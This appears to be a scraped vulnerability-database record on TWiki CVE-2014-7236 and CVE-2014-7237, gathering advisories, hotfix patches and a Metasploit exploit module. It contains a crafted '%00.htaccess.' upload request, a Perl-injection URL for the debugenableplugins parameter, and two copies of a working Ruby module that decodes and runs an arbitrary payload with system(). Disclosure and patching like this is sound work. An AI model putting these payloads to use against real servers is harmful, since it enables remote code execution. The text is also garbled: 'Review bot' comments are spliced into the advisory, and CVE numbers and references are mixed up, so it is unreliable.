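Review bot: the added lines in this hunk close the hole by allow-listing rather than escaping, and that deserves a comment stronger than "Sanitize parameter": after `s/[^a-zA-Z0-9]//go` every token is a bare identifier and `grep { /Plugin$/ }` discards anything else, so the `eval "use $p;"` shown under Details can only ever receive a plain module name (a crafted token such as `Foo;system("id")Plugin` collapses to `FoosystemidPlugin`, and the resulting `use` simply fails to locate a module). Two small points on the same lines: the `/o` modifier does nothing on a pattern with no interpolated variables and can be dropped, and the `s///` inside `map` writes to `$_`, which is aliased to the list being mapped; that is harmless for the temporaries returned by `split`, but will mutate the caller's array if someone later feeds a variable into this pipeline, so `map { (my $n = $_) =~ s/[^a-zA-Z0-9]//g; $n }` is the safer idiom. A stricter version would also require each surviving name to be one of the configured plugins that the `else` branch below already consults via `$TWiki::cfg{PluginsOrder}`, instead of accepting any alphanumeric name that ends in Plugin.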
2014-10-06 - security team creates advisory with hotfix - PeterThoeny\r\n * 2014-10-07 - send alert to TWikiAnnounceMailingList [5] and TWikiDevMailingList [6] - PeterThoeny\r\n * 2014-10-09 - publish advisory in Codev web and update all related topics - PeterThoeny\r\n * 2014-10-09 - issue a public security advisory to fulldisclosure[at]seclists.org, cert[at]cert.org, vuln[at]secunia.com, bugs[at]securitytracker.com, submissions[at]packetstormsecurity.org - PeterThoeny\r\n\r\n---++ External Links\r\n\r\n[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess\r\n[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01\r\n[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 (will be created on 2014-10-09)\r\n[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList\r\n[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList\r\n[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList\r\n[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236 - CVE on MITRE.org\r\n[8]: http://develop.twiki.org/~twiki4/cgi-bin/view/Bugs/Item7558\r\n\r\n---++ Feedback\r\n\r\nPlease provide feedback at the security alert topic, http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 once it exists (this topic will be created on Mon, 2014-10-09).\r\n\r\nPlease send an e-mail to [email\u00a0protected] if you have any questions before Monday.\r\n\r\n---++ Attack Vectors\r\n\r\nUse an HTTP POST request towards a TWiki on Windows server to upload a specially named file (typically port 80/TCP). 
Prior authentication is typically required.\r\n\r\n---++ Impact\r\n\r\nA remote attacker can upload a '.htaccess' file that may make uploaded files executable on the server.\r\n\r\n---++ Severity Level\r\n\r\nThe TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess and assigned the following severity level:\r\n\r\n * Severity 1 issue: The web server can be compromised \r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name CVE-2014-7237 [3] to this vulnerability. \r\n\r\n---++ Details\r\n\r\nIf you attach a file named '%00.htaccess.' (i.e. a '.htaccess' configuration file with a leading null character and a trailing dot) to a TWiki server on Windows, the attached file will be saved with the name '.htaccess'. Assuming Apache is configured to allow directory-level configuration files, it is therefore possible to upload a configuration file that controls the attachment directory. This can be exploited to remotely upload and execute files on the TWiki server.\r\n\r\n__Background:__\r\n\r\nIn order to provide its users with dynamic content functionality, TWiki allows any sort of file to be uploaded and attached to articles and pages. 
This may seem like a dangerous thing to do, but TWiki protects itself in a pretty good way: it makes sure the file does not have a dangerous extension (such as .php or .cgi) by using the following regex:\r\n\r\n^(\\.htaccess|.*\\.(?i)(?:php[0-9s]?(\\..*)?|[sp]htm[l]?(\\..*)?|pl|py|cgi))$\r\n\r\nIf it does, TWiki appends a '.txt' extension to the file name.\r\n\r\nOn top of that, TWiki also uses an .htaccess file with the 'Options None' directive, which prohibits any use of CGI execution, and with the PHP engine flag set to 'Off', which disables PHP execution.\r\n\r\nApart from all these defenses, TWiki makes sure it uses only the base name of the uploaded file (the file name without any directory path), it removes any leading dots, and removes any dangerous characters (such as the famous null byte). These security measures leave us with almost nothing to do. Even without the Perl-based defenses, the .htaccess file does a pretty good job of securing the upload directory against any kind of code execution. So, the only logical thing to do is to try to upload an .htaccess file directly into the upload folder in order to bypass the original .htaccess file located at the root of the TWiki 'pub' directory.\r\n\r\nIn order to do that we first must upload a file whose name starts with a dot. Let's look at the steps TWiki takes to secure the file name: first it takes the file name without any directory path, then it removes any leading dots, then it removes any dangerous characters, and finally it checks the file name using the regex mentioned above.\r\n\r\nSo, uploading a file named '.htaccess' just won't work because of the leading dots removal. But what if we use a file name like '%00.htaccess'? TWiki will first try to remove any leading dots, but because the name doesn't have any (because of the leading null byte) none will be removed. 
Then it will remove any dangerous characters - our null byte - and that will leave us with a nice clean '.htaccess' name.\r\n\r\nBut, what about the regex? We can see the regex only checks for a file named specifically '.htaccess'. For example, a file named '.htaccesstest' will be uploaded successfully.\r\n\r\nBut what can we do with that? Well, in Windows, file names ending with a dot will be changed - the dot will be removed. That means uploading a file named '.htaccess.' will pass the regex check, and the dot will be removed when storing the file, resulting in a file named '.htaccess'.\r\n\r\nSo, if we upload a file named '%00.htaccess.' and it contains the 'Options' directive as 'All' and the 'SetHandler' directive to allow CGI-scripts to be executed under a different extension, we will be able to execute code on the server.\r\n\r\n__Example attack post:__\r\n\r\n=======( 8>< CUT )===============================================\r\nPOST /Research/TWiki-6.0.0/bin/upload.cgi/Main/WebHome HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7AqcZ2eUSlxvoRFj\r\nCookie: TWIKISID=e7df45fd5e783fd6a44391dadd782c43\r\nContent-Length: 391\r\n\r\n------WebKitFormBoundary7AqcZ2eUSlxvoRFj\r\nContent-Disposition: form-data; name=\"crypttoken\"\r\n\r\n22b989482d3418971a50f4914dca0dcf\r\n------WebKitFormBoundary7AqcZ2eUSlxvoRFj\r\nContent-Disposition: form-data; name=\"filepath2\"; filename=\"%00.htaccess.\"\r\nContent-Type: text/plain\r\n\r\nOptions All\r\n<FilesMatch \\.lolz$>\r\n SetHandler cgi-script\r\n</FilesMatch>\r\n=======( 8>< CUT )===============================================\r\n\r\n---++ Countermeasures\r\n\r\n * Apply hotfix (see patch below), or\r\n * Upgrade to the latest patched production release TWiki-6.0.1 (TWikiRelease06x00x01) [2]\r\n\r\n---++ Hotfix for TWiki Production Release 6.0.0\r\n\r\nApply the patch listed in the TWiki bug item at TWikibug:Item7560 [8]. 
The patch is also listed here, but due to whitespace changes in e-mail it is not recommended to use below patch.\r\n\r\nNOTE: In case you use a Perl accelerator make sure to clear the script cache. For example, in case of SpeedyCGI remove the speedy cache (tmp/speedy.*) before restarting Apache.\r\n\r\nAffected file: twiki/lib/TWiki/Sandbox.pm\r\n\r\nPatch to sanitize uploaded file names:\r\n\r\n=======( 8>< CUT )===============================================\r\n--- TWiki/Sandbox.pm.save1 2014-10-01 19:50:45.000000000 -0400\r\n+++ TWiki/Sandbox.pm 2014-10-01 20:13:31.000000000 -0400\r\n@@ -194,8 +194,11 @@\r\n # remember to test with IE. \r\n $fileName =~ s{[\\\\/]+$}{}; # Get rid of trailing slash/backslash (unlikely)\r\n $fileName =~ s!^.*[\\\\/]!!; # Get rid of directory part\r\n+ $fileName =~ s/[\\x00-\\x19]//go; # Item7560: Remove non-printable characters\r\n \r\n my $origName = $fileName;\r\n+ # Item7560: Strip trailing dots\r\n+ $fileName =~ s/\\.*$//o;\r\n # Change spaces to underscore\r\n $fileName =~ s/ /_/go;\r\n # Strip dots and slashes at start\r\n@@ -214,6 +217,11 @@\r\n # Append .txt to some files\r\n $fileName =~ s/$TWiki::cfg{UploadFilter}/$1\\.txt/goi;\r\n \r\n+ # Item7483, prevent a null file name\r\n+ if ( $fileName eq '' || $fileName =~ /^\\./ ) {\r\n+ $fileName = '_' . $fileName;\r\n+ }\r\n+ \r\n # Untaint\r\n $fileName = untaintUnchecked($fileName);\r\n\r\n=======( 8>< CUT )===============================================\r\n\r\n---++ Hotfix for Older Affected TWiki Releases\r\n\r\nApply above patch (line numbers may vary).\r\n\r\n---++ Verify Hotfix\r\n\r\nTo verify the patch, upload a file with a POST as described in the details. 
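Review bot: in the first Sandbox.pm hunk (@@ -194,8 +194,11 @@), the new line `$fileName =~ s/[\x00-\x19]//go; # Item7560: Remove non-printable characters` stops at \x19, so the control characters \x1A through \x1F (and DEL, \x7F) survive in the file name, which does not match the comment and looks like a hex/decimal mix-up (decimal 31 is \x1F); the range should read `[\x00-\x1f\x7f]`. The new trailing-dot strip `$fileName =~ s/\.*$//o;` is correctly placed before the leading-dot strip and the UploadFilter check, so a name such as `.htaccess.` is normalized before it is tested; a comment stating that ordering dependency would help the next maintainer.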
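Review bot: in the second Sandbox.pm hunk (@@ -214,6 +217,11 @@), the guard `if ( $fileName eq '' || $fileName =~ /^\./ )` prepends '_' and carries on; that is fine as defense in depth, but since leading dots are already stripped above, reaching the `/^\./` branch means an earlier sanitizer step was bypassed, which is worth logging rather than silently repairing. The comment cites Item7483 while the rest of the patch is Item7560; if both items apply, say so in the comment.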
Use any other non-printable character if you can't create a file with a null character, such as '%01.htaccess.'\r\n\r\n---++ Authors and Credits\r\n\r\n * Credit to Netanel Rubin (netanelr[at]checkpoint.com) for disclosing the issue with detailed description to the [email\u00a0protected] mailing list\r\n * PeterThoeny for creating the fix, patch and advisory\r\n * HideyoImazu for creating the TWiki-6.0.1 production release [2]\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2014-10-01 - Netanel Rubin of Check Point Software discloses issue to TWikiSecurityMailingList [4]\r\n * 2014-10-01 - developer verifies issue - PeterThoeny\r\n * 2014-10-01 - developer fixes code - PeterThoeny\r\n * 2014-10-05 - developer creates new TWiki-6.0.1 patch release [2] with fix - HideyoImazu\r\n * 2014-10-06 - security team creates advisory with hotfix - PeterThoeny\r\n * 2014-10-07 - send alert to TWikiAnnounceMailingList [5] and TWikiDevMailingList [6] - PeterThoeny\r\n * 2014-10-09 - publish advisory in Codev web and update all related topics - PeterThoeny\r\n * 2014-10-09 - issue a public security advisory to fulldisclosure[at]seclists.org, cert[at]cert.org, vuln[at]secunia.com, bugs[at]securitytracker.com, submissions[at]packetstormsecurity.org - PeterThoeny\r\n\r\n---++ External Links\r\n\r\n[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess\r\n[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01\r\n[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7237 (will be created on 2014-10-09)\r\n[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList\r\n[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList\r\n[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList\r\n[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7237 - CVE on MITRE.org\r\n[8]: http://develop.twiki.org/~twiki4/cgi-bin/view/Bugs/Item7560\r\n\r\n---++ Feedback\r\n\r\nPlease provide feedback at the security alert topic, 
http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7237 once it exists (this topic will be created on Mon, 2014-10-09).\r\n\r\nPlease send an e-mail to [email\u00a0protected] if you have any questions before Monday.\r\n\r\n-- Peter Thoeny - 2014-10-09\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22741"}], "freebsd": [{"lastseen": "2016-09-26T17:24:23", "bulletinFamily": "unix", "description": "\nTWiki developers report:\n\nThe debugenableplugins request parameter allows arbitrary\n\t Perl code execution.\nUsing an HTTP GET request towards a TWiki server,\n\t add a specially crafted debugenableplugins request parameter\n\t to TWiki's view script (typically port 80/TCP).\n\t Prior authentication may or may not be necessary.\nA remote attacker can execute arbitrary Perl code\n\t to view and modify any file the webserver user has access to.\nExample: http://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\r\\n\\r\\nVulnerable!\")%3bexit\nThe TWiki site is vulnerable if you see a page with text\n\t \"Vulnerable!\".\n\n", "modified": "2014-10-09T00:00:00", "published": "2014-10-09T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/21ce1840-6107-11e4-9e84-0022156e8794.html", "id": "21CE1840-6107-11E4-9E84-0022156E8794", "title": "twiki -- remote Perl code execution", "type": "freebsd", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:47", "bulletinFamily": "exploit", "description": "", "modified": "2014-10-10T00:00:00", "published": "2014-10-10T00:00:00", "href": "https://packetstormsecurity.com/files/128623/Twiki-Perl-Code-Execution.html", "id": "PACKETSTORM:128623", "type": "packetstorm", "title": "Twiki Perl Code Execution", "sourceData": "`This is an advisory for TWiki administrators: The debugenableplugins request parameter allows 
arbitrary Perl code execution. \n \nTWiki ( http://twiki.org ) is an Open Source Enterprise Wiki and Web Application Platform used by millions of people. \n \n* Vulnerable Software Version \n* Attack Vectors \n* Impact \n* Severity Level \n* MITRE Name for this Vulnerability \n* Details \n* Countermeasures \n* Hotfix for TWiki Production Release 6.0.0 \n* Hotfix for Older Affected TWiki Releases \n* Verify Hotfix \n* Authors and Credits \n* Action Plan with Timeline \n* External Links \n* Feedback \n \n---++ Vulnerable Software Version \n \n* TWiki-6.0.0 (TWikiRelease06x00x00) \n* TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04) \n* TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02) \n* TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02) \n* TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04) \n* TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02) \n* TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05) \n \n---++ Attack Vectors \n \nUsing an HTTP GET request towards a TWiki server, add a specially crafted 'debugenableplugins' request parameter to TWiki's view script (typically port 80/TCP). Prior authentication may or may not be necessary. \n \n---++ Impact \n \nA remote attacker can execute arbitrary Perl code to view and modify any file the webserver user has access to. \n \n---++ Severity Level \n \nThe TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess [1] and assigned the following severity level: \n \n* Severity 1 issue: The web server can be compromised \n \n---++ MITRE Name for this Vulnerability \n \nThe Common Vulnerabilities and Exposures project has assigned the name CVE-2014-7236 [7] to this vulnerability. \n \n---++ Details \n \nIt is possible to execute arbitrary Perl code by adding a =debugenableplugins= parameter with a specially crafted value. 
Example: \n \nhttp://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\r\\n\\r\\nVulnerable!\")%3bexit \n \nThe TWiki site is vulnerable if you see a page with text \"Vulnerable!\". \n \n__Background:__ \n \nTWiki allows enabling specific plugins for debug purposes using a 'debugenableplugins' parameter that lists the plugins to enable. In order to support this dynamic loading of plugins, TWiki inserts the plugin name into the following Perl =eval= statement without sanitizing the plugin name: \n<verbatim> \nmy $p = $this->{module}; \neval \"use $p;\"; \n</verbatim> \n \n---++ Countermeasures \n \n* Apply hotfix (see patch below). \n* Upgrade to the latest patched production release TWiki-6.0.1 (TWikiRelease06x00x01) [2] \n \n---++ Hotfix for TWiki Production Release 6.0.0 \n \nApply the patch listed in the TWiki bug item at TWikibug:Item7558 [8]. The patch is also listed here, but due to whitespace changes in e-mail it is not recommended to use below patch. \n \nNOTE: In case you use a Perl accelerator make sure to clear the script cache. For example, in case of SpeedyCGI remove the speedy cache (tmp/speedy.*) before restarting Apache. 
\n \nAffected file: twiki/lib/TWiki/Plugins.pm \n \nPatch to sanitize the 'debugenableplugins' parameter: \n \n=======( 8>< CUT )=============================================== \n--- TWiki/Plugins.pm.save1 2014-01-09 02:10:56.000000000 -0500 \n+++ TWiki/Plugins.pm 2014-10-01 20:30:36.000000000 -0400 \n@@ -186,8 +186,11 @@ \n \nunless( $allDisabled ) { \nif ( $query && defined( $query->param( 'debugenableplugins' ))) { \n- @pluginList = split( /[,\\s]+/, \n- $query->param( 'debugenableplugins' )); \n+ @pluginList = \n+ grep { /Plugin$/ } \n+ map { s/[^a-zA-Z0-9]//go; $_ } # Item7558: Sanitize parameter \n+ split( /[,\\s]+/, $query->param( 'debugenableplugins' )); \n+ \n} else { \nif( $TWiki::cfg{PluginsOrder} ) { \nforeach my $plugin( split( /[,\\s]+/, \n=======( 8>< CUT )=============================================== \n \n---++ Hotfix for Older Affected TWiki Releases \n \nApply above patch (line numbers may vary). \n \n---++ Verify Hotfix \n \nTo verify the patch add the following parameter to any TWiki topic: \n \n?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\r\\n\\r\\nVulnerable!\")%3bexit \n \nThe site is vulnerable if a page is returned with text \"Vulnerable!\" \n \n---++ Authors and Credits \n \n* Credit to Netanel Rubin (netanelr[at]checkpoint.com) for disclosing the issue to the twiki-security@lists.sourceforge.netmailing list \n* PeterThoeny for creating the fix, patch and advisory \n* HideyoImazu for creating the TWiki-6.0.1 production release [2] \n \n---++ Action Plan with Timeline \n \n* 2014-10-01 - Netanel Rubin of Check Point Software discloses issue to TWikiSecurityMailingList [4] \n* 2014-10-01 - developer verifies issue - PeterThoeny \n* 2014-10-01 - developer fixes code - PeterThoeny \n* 2014-10-05 - developer creates new TWiki-6.0.1 patch release [2] with fix - HideyoImazu \n* 2014-10-06 - security team creates advisory with hotfix - PeterThoeny \n* 2014-10-07 - send alert to TWikiAnnounceMailingList [5] and 
TWikiDevMailingList [6] - PeterThoeny \n* 2014-10-09 - publish advisory in Codev web and update all related topics - PeterThoeny \n* 2014-10-09 - issue a public security advisory to fulldisclosure[at]seclists.org, cert[at]cert.org, vuln[at]secunia.com, bugs[at]securitytracker.com, submissions[at]packetstormsecurity.org - PeterThoeny \n \n---++ External Links \n \n[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess \n[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01 \n[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 (will be created on 2014-10-09) \n[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList \n[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList \n[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList \n[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236 - CVE on MITRE.org \n[8]: http://develop.twiki.org/~twiki4/cgi-bin/view/Bugs/Item7558 \n \n---++ Feedback \n \nPlease provide feedback at the security alert topic, http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 once it exists (this topic will be created on Mon, 2014-10-09). \n \nPlease send an e-mail to twiki-security@lists.sourceforge.net if you have any questions before Monday. \n \n-- Peter Thoeny - 2014-10-09 \n \n \n-- \n> Peter Thoeny - Peter09[at]Thoeny.org \n> http://bit.ly/MrTWiki - consulting on enterprise collaboration \n> http://TWiki.org - is your team already TWiki enabled? 
\n> Knowledge cannot be managed, it can be discovered and shared \n> This e-mail is: (_) private (_) ask first (x) public \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/128623/twiki-debugexec.txt"}, {"lastseen": "2016-12-05T22:21:04", "bulletinFamily": "exploit", "description": "", "modified": "2015-03-19T00:00:00", "published": "2015-03-19T00:00:00", "href": "https://packetstormsecurity.com/files/130906/TWiki-Debugenableplugins-Remote-Code-Execution.html", "id": "PACKETSTORM:130906", "type": "packetstorm", "title": "TWiki Debugenableplugins Remote Code Execution", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TWiki Debugenableplugins Remote Code Execution', \n'Description' => %q{ \nTWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality. 
\nThe value of the debugenableplugins parameter is used without proper sanitization \nin an Perl eval statement which allows remote code execution \n}, \n'Author' => \n[ \n'Netanel Rubin', # from Check Point - Discovery \n'h0ng10', # Metasploit Module \n \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-7236'], \n[ 'OSVDB', '112977'], \n[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236'] \n], \n'Privileged' => false, \n'Targets' => \n[ \n[ 'Automatic', \n{ \n'Payload' => \n{ \n'BadChars' => \"\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl python php', \n} \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Oct 09 2014')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"TWiki path\", '/do/view/Main/WebHome' ]), \nOptString.new('PLUGIN', [true, \"A existing TWiki Plugin\", 'BackupRestorePlugin']) \n], self.class) \nend \n \n \ndef send_code(perl_code) \nuri = target_uri.path \ndata = \"debugenableplugins=#{datastore['PLUGIN']}%3b\" + CGI.escape(perl_code) + \"%3bexit\" \n \nres = send_request_cgi!({ \n'method' => 'POST', \n'uri' => uri, \n'data' => data \n}) \n \nreturn res \nend \n \n \ndef check \nrand_1 = rand_text_alpha(5) \nrand_2 = rand_text_alpha(5) \n \ncode = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n#{rand_1}\\\".\\\"#{rand_2}\\\")\" \nres = send_code(code) \n \nif res and res.code == 200 \nreturn CheckCode::Vulnerable if res.body == rand_1 + rand_2 \nend \nCheckCode::Unknown \nend \n \n \ndef exploit \ncode = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\\\");\" \ncode += \"require('MIME/Base64.pm');MIME::Base64->import();\" \ncode += \"system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit\" \nres = send_code(code) \nhandler \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/130906/twiki_debug_plugins.rb.txt", "cvss": 
{"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2019-12-05T07:25:22", "bulletinFamily": "exploit", "description": "TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution.\n", "modified": "2017-07-24T13:26:21", "published": "2015-03-18T08:45:08", "id": "MSF:EXPLOIT/UNIX/HTTP/TWIKI_DEBUG_PLUGINS", "href": "", "type": "metasploit", "title": "TWiki Debugenableplugins Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TWiki Debugenableplugins Remote Code Execution',\n 'Description' => %q{\n TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality.\n The value of the debugenableplugins parameter is used without proper sanitization\n in an Perl eval statement which allows remote code execution.\n },\n 'Author' =>\n [\n 'Netanel Rubin', # from Check Point - Discovery\n 'h0ng10', # Metasploit Module\n\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-7236'],\n [ 'OSVDB', '112977'],\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Automatic',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl python php',\n }\n },\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Oct 09 2014'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"TWiki path\", '/do/view/Main/WebHome' ]),\n OptString.new('PLUGIN', [true, \"A existing TWiki Plugin\", 
'BackupRestorePlugin'])\n ])\n end\n\n\n def send_code(perl_code)\n uri = target_uri.path\n data = \"debugenableplugins=#{datastore['PLUGIN']}%3b\" + CGI.escape(perl_code) + \"%3bexit\"\n\n res = send_request_cgi!({\n 'method' => 'POST',\n 'uri' => uri,\n 'data' => data\n })\n\n return res\n end\n\n\n def check\n rand_1 = rand_text_alpha(5)\n rand_2 = rand_text_alpha(5)\n\n code = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n#{rand_1}\\\".\\\"#{rand_2}\\\")\"\n res = send_code(code)\n\n if res and res.code == 200\n return CheckCode::Vulnerable if res.body == rand_1 + rand_2\n end\n CheckCode::Unknown\n end\n\n\n def exploit\n code = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\\\");\"\n code += \"require('MIME/Base64.pm');MIME::Base64->import();\"\n code += \"system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit\"\n res = send_code(code)\n handler\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/http/twiki_debug_plugins.rb"}]}